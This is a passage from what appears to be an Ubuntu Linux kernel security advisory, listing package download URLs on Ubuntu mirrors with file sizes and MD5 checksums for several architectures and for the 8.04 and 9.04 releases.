http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-28-generic_2.6.24-28.70_i386.deb
  Size/MD5: 26364898 875fb60bc5bf8621b97c5574d07e55c8
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-28-server_2.6.24-28.70_i386.deb
  Size/MD5: 27385008 9bec1d2b2b78583fcecedcd5c8ff3960
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-28-virtual_2.6.24-28.70_i386.deb
  Size/MD5: 24877718 482b8cef0cf005a8483d11ed3b364964
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.24-28.70_i386.deb
  Size/MD5:   709188 26cf4f59b5a9cb16b1c5288e9ecbea34
http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb
  Size/MD5:   258828 643f05e4db376d0bf7558133f91a3cfb
http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb
  Size/MD5:   264144 8770cbfb2e0e62965819cc57092f779e
http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb
  Size/MD5:   163268 f173ed5d6f19c886c3e05041e233e310
http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb
  Size/MD5:   163024 6bb17cdade9c310a5d75eeca5908b7e3
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb
  Size/MD5:   236736 01de1ba5a354f340f81355f9e7ade04a
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb
  Size/MD5:   244974 b86f7aaf1e9200b8f4e91d0455f311f6
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb
  Size/MD5:  1810636 aaf2ac4ebeb43a06da06b3d74abc4029
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb
  Size/MD5:  1827690 3f37ecbc8236e915a23a1c308613910e
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb
  Size/MD5:   150834 dc34df5d314fbf390ef32a5695e2d4e4
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb
  Size/MD5:   143006 007db1ea88bc4bbf545e989cace61c1e
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb
  Size/MD5:   156088 f046f30af354e4423fa7f6929efa9cfc
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb
  Size/MD5:   157156 daa0873f69f4fa6a3e2c6a3f70a98dad
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb
  Size/MD5:   107216 11c20967c4aba25588cd33e41c62f577
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb
  Size/MD5:   108514 6d7f89b2f04c023440977996d99b1a09
http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb
  Size/MD5:    32952 8f3f5c65701052b71bbcd200e9727d68
http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb
  Size/MD5:    33384 959583f504cdc92260a2e9cd7f154fba
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb
  Size/MD5:    60690 46b409f735bcf21fbdcdd069421998bb
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb
  Size/MD5:    61148 2015776c1d327adfa0c00c77d14e7ca8
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb
  Size/MD5:    82646 498f6209320fef7240940bd2eafe8f91
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb
  Size/MD5:    82950 f8cd11b646c7b769865e9b0a6e563479
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb
  Size/MD5:    48532 fe22024e55539bf9079c05f25651599f
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb
  Size/MD5:    48460 c070e99c0ec169067c45861ee64e7b00
http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb
  Size/MD5:     8190 764f83aca8e039670b54ef1bd81bf5c7
http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb
  Size/MD5:     8438 40dd61311a71fb4f258b651d130fedc2
http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb
  Size/MD5:    51108 f788272ef04244c5338f2eb833c68c5c
http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb
  Size/MD5:    52946 6a3a99cd19757aa4a7e5bf9bf0cdcdd5
http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb
  Size/MD5:    92156 a595388aea811859919835a4688eeec0
http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb
  Size/MD5:    92430 b1a87544de05790689dedd1408f95825
http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb
  Size/MD5:  1443730 ba618401639337ede996442e8d85c657
http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb
  Size/MD5:  1426998 8d420db6ebadfd73a40ebb281f29b5e9
http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb
  Size/MD5:    43244 264bc9d22f2d87c78d9ec1246b475907
http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb
  Size/MD5:    42806 f16161dac125195d296c774de1c55ec7
http://security.ubuntu.com/ubuntu/pool/main/l/linux/socket-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb
  Size/MD5:    11404 882437fd9335b261cd2ce699edda462e
http://security.ubuntu.com/ubuntu/pool/main/l/linux/socket-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb
  Size/MD5:    12012 20555d5db134914f14f234201b050957
http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb
  Size/MD5:   471770 7ea7283725e9fc661d40c780fe6e41a3
http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb
  Size/MD5:   473736 ab685d960b7ae1f4397f08dca1e3c00f
http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb
  Size/MD5:    70512 f3a95ca8d7726b950d0145ee38a3c90a
http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb
  Size/MD5:    71380 592677ef1ec0f18ae8ac4704e7f6abb2
http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-28-openvz_2.6.24-28.70_i386.deb
  Size/MD5: 20246854 551dee4824d56cd54ebd6e2ceed36ce4
http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-28-rt_2.6.24-28.70_i386.deb
  Size/MD5: 18544608 b047a5db139862e418b7c420e3584e18
http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-28-xen_2.6.24-28.70_i386.deb
  Size/MD5: 18785694 ab4b0f6acb874628d207503ab96c72a5

powerpc architecture (Apple Macintosh G3/G4/G5):

http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb
  Size/MD5:   334050 cb0a2732f7d57db2d4cf0aff024b0742
http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb
  Size/MD5:   318522 845ff20c4f352d9accc1809e99f8a1a6
http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb
  Size/MD5:    62720 da2d0022028e792d039fe638a6e511b2
http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb
  Size/MD5:    73010 505d3154aa77be5a0e1ad64dfd6ae565
http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb
  Size/MD5:    41444 0358500eff1aa734aa460223cffbd6fe
http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb
  Size/MD5:    47828 41d9d6981ea0fb6efb885530e55d229a
http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb
  Size/MD5:    89502 13e293ff0eeef8f0a25532cbc1f6c59e
http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb
  Size/MD5:   105748 0276e7fc8215525f00c10d0d78729e74
http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb
  Size/MD5:    44828 a6ad64ce75120444ae7f77eb185f8341
http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb
  Size/MD5:    40932 b70c6c4ee3bad7a338ef382e8a3cdc13
http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb
  Size/MD5:   704802 2482fd05dab21510ca1d1cb12255f28d
http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb
  Size/MD5:   771068 65cf59f3797041350a9066d561c0e064
http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb
  Size/MD5:   243302 dafec4c170c159b89196ce5a1b3728c1
http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb
  Size/MD5:   246242 3efe238d1ffb86bb475953cceb77ed8a
http://ports.ubuntu.com/pool/main/l/linux/ide-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb
  Size/MD5:    69164 d97c8f78522a9bdc7b19f9d9eddef075
http://ports.ubuntu.com/pool/main/l/linux/ide-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb
  Size/MD5:   132596 1e4fd78863d1c805c3fbfef2adabc1cf
http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb
  Size/MD5:    70242 46c97ad3a53ccee9e557521ef833ade4
http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb
  Size/MD5:    77458 a7d9a6a35e41c3a8e7552471f78f2de6
http://ports.ubuntu.com/pool/main/l/linux/ipv6-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb
  Size/MD5:   146272 074f4acf53ffc60e19b36d4360a6872f
http://ports.ubuntu.com/pool/main/l/linux/ipv6-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb
  Size/MD5:   165012 02994ab52ccb8b88c8a85954c04c214a
http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb
  Size/MD5:   388012 3d1d5851c82d9b38f7764a2183ec6b72
http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb
  Size/MD5:   350478 d5c91796ae6b0f20f52cab3328f9b233
http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb
  Size/MD5:  2431708 6b69540ac9168a1068af1c829e6ad807
http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb
  Size/MD5:  3474134 efd7274967d4c93a4b4f757b8b663f1b
http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-28-powerpc-smp_2.6.24-28.70_powerpc.deb
  Size/MD5:   654288 16629f59f727a0d5d1ce1a2f178fdbdc
http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-28-powerpc64-smp_2.6.24-28.70_powerpc.deb
  Size/MD5:   659270 3acd9fa19531e93a19b79b92946742fe
http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-28-powerpc_2.6.24-28.70_powerpc.deb
  Size/MD5:   654194 19fb231dfad96a5202c96e0a963608a6
http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-28-powerpc-smp_2.6.24-28.70_powerpc.deb
  Size/MD5: 20175768 245a4d510c48479ca8608d064bb4d0f1
http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-28-powerpc64-smp_2.6.24-28.70_powerpc.deb
  Size/MD5: 21380060 4c2463eeb9eec0f53a8336ffea5d2f37
http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-28-powerpc_2.6.24-28.70_powerpc.deb
  Size/MD5: 19950242 58918c61f50c52423dde5bb0cfea337e
http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.24-28.70_powerpc.deb
  Size/MD5:   699320 f121a6d0897b8a3e3570355ad721475f
http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb
  Size/MD5:   266748 96cc9a56b70590f6ef9cb4f42abd9f4c
http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb
  Size/MD5:   307734 2a8ec116cdc2b993d54831e547d3cfe4
http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb
  Size/MD5:   192248 ae395f02a06c83624393880a1c8bc755
http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb
  Size/MD5:   201694 0523582031686284be72e9516eb874ed
http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb
  Size/MD5:   272066 97f5240c866f23e18620876700e08bd5
http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb
  Size/MD5:   306006 a09ded2fdc08a8b4fd286d5a732de719
http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb
  Size/MD5:  1807806 f968364fcce3f3e06fe0229f9ad00400
http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb
  Size/MD5:  2119512 8826a9667e0813ad11f13ef49ed0c9ba
http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb
  Size/MD5:   235184 4d42dbe3fee5610fefc492c84f82f01d
http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb
  Size/MD5:   225400 72d96411968df5bb24b6c3409111f368
http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb
  Size/MD5:   170442 65ea470d4661896774e2b17744bde9ea
http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb
  Size/MD5:   199750 8e539809543d9b39931c2f9c0b608fd3
http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb
  Size/MD5:   117952 9c0be00ccf310652a819d67e7fecbbbc
http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb
  Size/MD5:   139264 366dd0c02e403ef16c9da1ed940336bb
http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb
  Size/MD5:    45374 7da2780fd97a9efdb2891c4cd3dbb611
http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb
  Size/MD5:    46836 f96d04782ea762bb25c5b7fa13927742
http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb
  Size/MD5:    51136 7eeb8c67107d09cca5d6ec53b4e0e640
http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb
  Size/MD5:    60300 75caefd9be900faf4d7bd665e0a87e49
http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb
  Size/MD5:    74182 2b8011cab437a41dc77b94b88e469222
http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb
  Size/MD5:    87214 134a0a4d60e3a4d00ad71d8a38a00054
http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb
  Size/MD5:    76092 ad9b456136a6e9bad3004f4e618dbcca
http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb
  Size/MD5:    30230 83682f80fc1250d73ca5766262c8cf8e
http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb
  Size/MD5:     8488 6726b989a4df2541daca42af39d3a30b
http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb
  Size/MD5:    10030 4812e4833e0e4b3ca8e55079cd13d7ff
http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb
  Size/MD5:    57440 d72f21d71d83cb31c79aa785a6c158a4
http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb
  Size/MD5:    68744 0276d8aa4abc940cae72d4451ba65cdc
http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb
  Size/MD5:   101186 a3d4b7bea0440fcd1475bc292cece983
http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb
  Size/MD5:   147822 372e114f4f7becea140fa5f33851d694
http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb
  Size/MD5:  1565814 f4456b5f007c8e045f81e6de0ea25f99
http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb
  Size/MD5:  1514592 726d8053f7f1ddebe305118ee429a5c2
http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb
  Size/MD5:    76668 a8fe769d492687b7b0e3ae95e1f28038
http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb
  Size/MD5:    85974 0aa16271f113ef2bb68b07dd5e387800
http://ports.ubuntu.com/pool/main/l/linux/socket-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb
  Size/MD5:    12710 dac27b9a6eed7ad24e351060e8b2858f
http://ports.ubuntu.com/pool/main/l/linux/socket-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb
  Size/MD5:    14558 ec5ed3428e4b13a483d2ff19cff1ccfc
http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb
  Size/MD5:   450810 4260e241f3f0cb6735739ccea2e70cda
http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb
  Size/MD5:   505340 18d9294716dcdba902081c38ae39a676
http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb
  Size/MD5:    83696 1ad62154f4910af7748784cc71c8ec39
http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb
  Size/MD5:   108846 89b0ef22256773f155bd3d3868dde5cf

sparc architecture (Sun SPARC/UltraSPARC):

http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.24-28-sparc64-di_2.6.24-28.70_sparc.udeb
  Size/MD5:    59576 50a041d5ddbcac27bae81c81a94584e6
http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.24-28-sparc64-di_2.6.24-28.70_sparc.udeb
  Size/MD5:    71726 6be6331d6cec8cdcfb63a25a1d94d0c6
http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.24-28-sparc64-di_2.6.24-28.70_sparc.udeb
  Size/MD5:    42442 750e7a8fbcf37e4f1e18d75952056d6d
http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.24-28-sparc64-di_2.6.24-28.70_sparc.udeb
  Size/MD5:    91778 ae78c7f7ed5677eadcd2bbd04e12e624
http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.24-28-sparc64-di_2.6.24-28.70_sparc.udeb
  Size/MD5:   587170 b8ce9c8d08ad3d2d4527e0ac285a2e85
http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.24-28-sparc64-di_2.6.24-28.70_sparc.udeb
  Size/MD5:   171076 70d9840d79c7d897510c19812c849109
http://ports.ubuntu.com/pool/main/l/linux/ide-modules-2.6.24-28-sparc64-di_2.6.24-28.70_sparc.udeb
  Size/MD5:    22356 684c85bec9286e7c3364cd7e7d20f056
http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.24-28-sparc64-di_2.6.24-28.70_sparc.udeb
  Size/MD5:    46052 ca2fe0707c599d22956dfb3fc8abc724
http://ports.ubuntu.com/pool/main/l/linux/ipv6-modules-2.6.24-28-sparc64-di_2.6.24-28.70_sparc.udeb
  Size/MD5:   152976 0d22680968c277f76a4001889af0431f
http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.24-28-sparc64-di_2.6.24-28.70_sparc.udeb
  Size/MD5:  2135604 1b0f5a9cde179230c1166358c726305b
http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-28-sparc64-smp_2.6.24-28.70_sparc.deb
  Size/MD5:   567336 5eec7e6775fe7fea52ca71b52f4de8c3
http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-28-sparc64_2.6.24-28.70_sparc.deb
  Size/MD5:   565774 d5ff9b03b0d4b52aa4b462e9d3b536d9
http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-28-sparc64-smp_2.6.24-28.70_sparc.deb
  Size/MD5: 14098838 83993d0248f289169a7afef405666fbc
http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-28-sparc64_2.6.24-28.70_sparc.deb
  Size/MD5: 13833014 504a7d30fc2f014e930eb66bfa369485
http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.24-28.70_sparc.deb
  Size/MD5:   754240 83b808eeb2d8b4061ddf9d268e44171a
http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.24-28-sparc64-di_2.6.24-28.70_sparc.udeb
  Size/MD5:   270056 98f38a0933d936d9aa8112fb6a8e2f79
http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.24-28-sparc64-di_2.6.24-28.70_sparc.udeb
  Size/MD5:   190354 c4600cac5d626ddfa61d83a1ec671247
http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.24-28-sparc64-di_2.6.24-28.70_sparc.udeb
  Size/MD5:   263026 a7df05507a97bf05575bfe742c1f7fa5
http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.24-28-sparc64-di_2.6.24-28.70_sparc.udeb
  Size/MD5:  1386390 54a61a95d39edbcc445094f29c42f262
http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.24-28-sparc64-di_2.6.24-28.70_sparc.udeb
  Size/MD5:   175414 69911cef4dd5a0d3d030a528ce8457b9
http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.24-28-sparc64-di_2.6.24-28.70_sparc.udeb
  Size/MD5:   122098 a0c2adf687a51bbe829adb835ecb71ee
http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.24-28-sparc64-di_2.6.24-28.70_sparc.udeb
  Size/MD5:    40394 3c68e727d9f14a708d9ffc7f1bbe3aff
http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.24-28-sparc64-di_2.6.24-28.70_sparc.udeb
  Size/MD5:    48058 19adf9ec3c25c920295662c53f3dda27
http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.24-28-sparc64-di_2.6.24-28.70_sparc.udeb
  Size/MD5:     8696 bb826a025cd7b1e9cd679c35c6126648
http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.24-28-sparc64-di_2.6.24-28.70_sparc.udeb
  Size/MD5:    60508 4afc2631d8b1f65d02491233d5ccda2e
http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.24-28-sparc64-di_2.6.24-28.70_sparc.udeb
  Size/MD5:   106836 b422f1235cb15f81230d03e9b3bdb4e1
http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.24-28-sparc64-di_2.6.24-28.70_sparc.udeb
  Size/MD5:  1002042 9b12e59032066f6fe401f01ee248cbda
http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.24-28-sparc64-di_2.6.24-28.70_sparc.udeb
  Size/MD5:     9518 b89c5ead0ec11c36566524fe1a6f544e
http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.24-28-sparc64-di_2.6.24-28.70_sparc.udeb
  Size/MD5:   391832 a484119637039fe91af1d8bbd8b320aa
http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.24-28-sparc64-di_2.6.24-28.70_sparc.udeb
  Size/MD5:    75926 8ad4b544689a8fee5dc03630477ca40c

Updated packages for Ubuntu 9.04:

Source archives:

http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.28-19.61.diff.gz
  Size/MD5:  7408064 bf077530cc28fc2c8ca7f9ebc05eed66
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.28-19.61.dsc
  Size/MD5:     3175 c72ff80106672ba9fe2b235ed9a26224
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.28.orig.tar.gz
  Size/MD5: 66766084 062c29b626a55f09a65532538a6184d4

Architecture independent packages:

http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-doc-2.6.28_2.6.28-19.61_all.deb
  Size/MD5:  3637802 0071d076650095f26837d5a5dedd2145
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.28-19_2.6.28-19.61_all.deb
  Size/MD5:  8702074 9443d9c2687b48b786cb25d72fb485a7
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-source-2.6.28_2.6.28-19.61_all.deb
  Size/MD5: 57052608 2e0d28a7e74ae69fa47a6e6f250948a0

amd64 architecture (Athlon64, Opteron, EM64T Xeon):

http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb
  Size/MD5:   234610 23fec831e3f61298baa06636eceedb01
